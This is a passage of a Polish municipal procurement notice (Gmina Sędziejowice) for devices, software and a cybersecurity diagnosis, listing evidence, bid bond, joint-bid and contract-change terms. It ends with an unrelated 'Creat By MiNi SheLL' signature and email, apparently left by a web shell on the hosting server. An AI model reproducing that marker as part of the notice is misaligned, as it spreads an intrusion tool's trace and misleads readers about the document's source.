dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy - załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający w celu potwierdzenia, że oferowane dostawy (część I zamówienia) odpowiadają wymaganiom określonym w<br/>Opisie przedmiotu zamówienia stanowiącym załącznik nr 1 do SWZ, wymaga złożenia przez Wykonawcę wraz z ofertą<br/>następujących przedmiotowych środków dowodowych:<br/>a) certyfikat lub dokument potwierdzający, że firma serwisująca monitory typu 1 posiada certyfikat ISO 9001 lub inny<br/>równoważny na świadczenie usług serwisowych oraz posiada autoryzację producenta komputera;<br/>b) dokumenty potwierdzające, że w przypadku niewywiązywania się z obowiązków gwarancyjnych przez wykonawcę lub<br/>firmę serwisującą producent monitora typu 1 przejmie wszelkie zobowiązania związane z serwisem. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) certyfikat lub dokument potwierdzający, że firma serwisująca monitory typu 1 posiada certyfikat ISO 9001 lub inny równoważny na świadczenie usług serwisowych oraz posiada autoryzację producenta komputera;<br/>b) dokumenty potwierdzające, że w przypadku niewywiązywania się z obowiązków gwarancyjnych przez wykonawcę lub<br/>firmę serwisującą producent monitora typu 1 przejmie wszelkie zobowiązania związane z serwisem. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium dla I części przedmiotu zamówienia w wysokości 2 000,00 zł (słownie: dwa<br/>tysiące i 00/100 złotych).<br/>2. Zamawiający nie wymaga wniesienia wadium dla pozostałych części przedmiotu zamówienia.<br/>3. Wadium może być wniesione w jednej z form opisanych w art. 97 ust. 7 ustawy Pzp.<br/>4. Wykonawca zobowiązany jest do wniesienia wadium przed upływem terminu składania ofert i utrzymania ich do terminu<br/>związania ofertą.<br/>5. Wadium w pieniądzu należy wnieść na rachunek bankowy Zamawiającego o nr 67 9279 0007 0050 3413 2000 0320. W<br/>tytule przelewu należy wpisać ,, wadium na zabezpieczenie oferty Wykonawcy w postępowaniu ,,Dostawa urządzeń i<br/>oprogramowania wraz z przeprowadzeniem diagnozy cyberbezpieczeństwa w ramach konkursu grantowego ,,Cyfrowa<br/>Gmina” realizowanego przez Gminę Sędziejowice ‘’<br/>6. W przypadku gwarancji i poręczenia wadium wniesione ma zostać w postaci elektronicznej, oryginale pod rygorem<br/>nieważności. Wadium należy dołączyć do oferty Wykonawcy. Dokument gwarancji i poręczenia powinien: określać<br/>Zamawiającego jako podmiot uprawniony wykonywania uprawnień z gwarancji, wskazanie kwoty pieniężnej stanowiącej<br/>zabezpieczenie, wskazanie, że gwarancja/poręczenie jest bezwarunkowe i nieodwołalne oraz zobowiązanie do wypłaty<br/>Zamawiającemu wadium w pełnej kwocie zgodnie z art. 98 ust. 6 ustawy Pzp, dane kontaktowe gwaranta/ poręczyciela takie<br/>jak nr telefonu, adres i e-mail.<br/>7. Termin obowiązywania gwarancji lub poręczenia musi być taki sam jak związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy zobowiązani są ustanowić pełnomocnika<br/>do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo winno być załączone do oferty w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o treści określonej w<br/>załączniku nr 3 do SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, w tym oświadczenie dotyczące<br/>przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>4. Zamawiający może żądać od Wykonawców, których oferta wybrana zostanie jako najkorzystniejszego przedłożenia<br/>umowy o współpracy, która powinna zawierać oświadczenie o solidarnej odpowiedzialności wobec Zamawiającego za wykonanie przedmiotu umowy o udzielnie zamówienia publicznego, wyznaczenie lidera konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany treści niniejszej umowy bez konieczności prowadzenia nowego postępowania<br/>w przypadku wystąpienia okoliczności opisanych poniżej.<br/>2. Zamawiający przewiduje możliwość zmiany niniejszej umowy:<br/>a. w przypadku zmiany terminu realizacji umowy (zmiana harmonogramu dostaw) będącymi wynikiem okoliczności leżących<br/>po stronie Zamawiającego lub Wykonawcy;<br/>b. w przypadku zmiany danych Zamawiającego lub Wykonawcy (np. adres siedziby, zmiana formy prawnej);<br/>c. w przypadku zmiany osób uprawnionych do realizacji umowy, o których mowa w § 3 niniejszej umowy;<br/>d. zmiany wynagrodzenia Wykonawcy o kwotę podatku VAT obowiązującą w chwili powstania obowiązku podatkowego;<br/>e. zmiana w zakresie podwykonawców, na których zasoby powołuje się Wykonawca.<br/>3. Zamawiający przewiduje możliwość zmiany umowy polegającej na zastąpieniu dotychczasowego Wykonawcy nowym<br/>Wykonawcą, w szczególności w przypadku połączenia, podziału, przekształcenia, upadłości Wykonawcy, rezygnacji<br/>wybranego Wykonawcy z realizacji zamówienia. Zmiana Wykonawcy może nastąpić, jeżeli nowy Wykonawca spełnia warunki udziału określone w SWZ.<br/>4. Zmiana niniejszej Umowy jest możliwa jeżeli łączna wartość zmian jest mniejsza niż progi unijne oraz jest niższa niż 10 %<br/>wartości zamówienia w pierwotnej umowie i nie prowadzi do zmiany charakteru umowy.<br/>5. W przypadku wprowadzenia zmian wymagane jest zachowanie formy pisemnej w postaci aneksu do umowy podpisanego<br/>przez obie strony pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu elektronicznie za pośrednictwem platformy zakupowej Gminy Sędziejowice dostępnym pod adresem: https://platformazakupowa.pl/pn/gmina_sedziejowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com